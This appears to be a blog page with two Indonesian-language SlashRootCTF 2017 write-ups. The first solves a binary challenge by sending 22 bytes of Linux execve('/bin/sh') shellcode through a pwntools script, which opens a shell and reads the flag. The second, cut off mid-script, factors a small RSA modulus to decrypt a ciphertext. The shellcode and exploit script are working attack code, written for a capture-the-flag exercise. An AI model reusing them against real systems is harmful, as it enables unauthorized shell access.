Showing posts with label Python. Show all posts
Showing posts with label Python. Show all posts

Saturday, June 17, 2017

Write Up SlashRoot - Gimme Something

Gimme Something (100pts)  Something special you can give to me.Connect: nc 103.200.7.150 7777  gimme_something  f6067d45d9e278f6913f8bddbd74f100 v Deskripsi Sama dengan soal sebelumnya kita diberikan akses ke server dan sebuah binary v Penyelesaian Pertama kita bongkar dengan ida namu ternyata fungsi run_it tidak dapat di psucode kita analisis dengan gdb. 0x08048531 <+100>: call   eax Kecurigaan terjadi pada address tersebut dan bagaimana caranya supaya kita bisa sampe ke address tersebut    0x08048509 <+60>: call   0x80483b0 <strlen@plt>    0x0804850e <+65>: cmp    eax,0x16 Dari address diatas panjang inputan kita harus sama dengan 0x16 = 22 berarti kita harus memiliki shell dengan panjang 22 bytes Mencoba mencari shell di http://shell-storm.org/shellcode kita coba dengan http://shell-storm.org/shellcode/files/shellcode-575.php kita tambahkan 1 bytes nopslide di awal sehingga menjadi \x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80 Kita coba tes langsung ke server [+] Opening connection to 103.200.7.150 on port 7777: Done [*] Switching to interactive mode [x] Welcome to #SlashRootCTF2K17 [x] Glad to see you here, enjoy the CTF \m/... $ ls -alh total 52K drwxr-x--- 17 0 1000 4.0K Jun  9 09:40 . drwxr-x--- 17 0 1000 4.0K Jun  9 09:40 .. -rwxr-x---  1 0 1000  220 Aug 31  2015 .bash_logout -rwxr-x---  1 0 1000 3.7K Aug 31  2015 .bashrc -rwxr-----  1 0 1000   36 Jun  9 09:29 .flag -rwxr-x---  1 0 1000  655 Jun 24  2016 .profile drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 bin drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 dev -rwxr-x---  1 0 1000 7.3K Jun  9 09:29 gimme_shell drwxr-xr-x 32 0    0 4.0K Jun  9 09:40 lib drwxr-xr-x  3 0    0 4.0K Jun  9 09:40 lib32 drwxr-xr-x  2 0    0 4.0K Jun  9 09:40 lib64 $ cat .flag SlashRootCTF{stairway_to_sHELLcode} Script pwn kurang lebih seperti ini  from pwn import * context(arch = 'i386', os = 'linux') r = remote('103.200.7.150', 7777) r.send("\x90\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80\n") r.interactive() Flag untuk tantangan ini yaitu SlashRootCTF{stairway_to_sHELLcode} MicrosoftInternetExplorer402DocumentNotSpecified7.8 磅Normal0...

Write Up SlashRoot - RSA

RSA (100pts)  N = 1799159815596838211639026598242739e = 200917020563208190152062461460131c = 318686567182196523307366910641013*format flag : SlashRootCTF{flag} Hint! Hasil perlu diconvert ke ascii v Deskripsi Peserta diberi sebuah soal kriptograpi RSA dimana N merupakan modulus, e merupakan exponen, serta c merupakan chipernya. v Penyelesaian Pertama kita harus mendapatkan faktor dari modulus N yaitu p q. Untuk mencarinya dengan cepat kita gunakan tools online factordb.com. p = 19900922910223213 q = 90405848196748703 Setelah itu di lakukan proses pembangkita private d, dan melakukan proses dekripsi pesan. Script kurang lebih seperti berikut. from Crypto.Util.number import inverse class Stack:     def __init__(self):         self.items = []     def item(self):         return self.items     def isEmpty(self):         return self.items == []     def push(self, item):         self.items.insert(0,item)     def pop(self):         return self.items.pop(0)     def peek(self):         return self.items[0]     def size(self):         return len(self.items) def calculate_privkey(p, q, e):     phi = (p-1) * (q-1)     d = inverse(e, phi)     return d def long_ascii_to_binary(M):     tmp_flag = Stack()     for i in str(M)[::-1]:         tmp_flag.push(i)     flag_assci = []     while not tmp_flag.isEmpty():         if int(tmp_flag.peek()) == 1:             flag_assci.append(int(tmp_flag.pop()+tmp_flag.pop()+tmp_flag.pop()))         elif int(tmp_flag.peek()) != 1:             flag_assci.append(int(tmp_flag.pop()+tmp_flag.pop()))     return ''.join(chr(x) for x in flag_assci) def main():     #modulus     N = 1799159815596838211639026598242739     #public exponent     e = 200917020563208190152062461460131     #chiper     C = 318686567182196523307366910641013...

Search This Blog

Powered by Blogger.

Langganan

Enter your email address:

Delivered by FeedBurner

 

© 2015 Learning Basic Network. All rights resevered. Designed by Templateism

Back To Top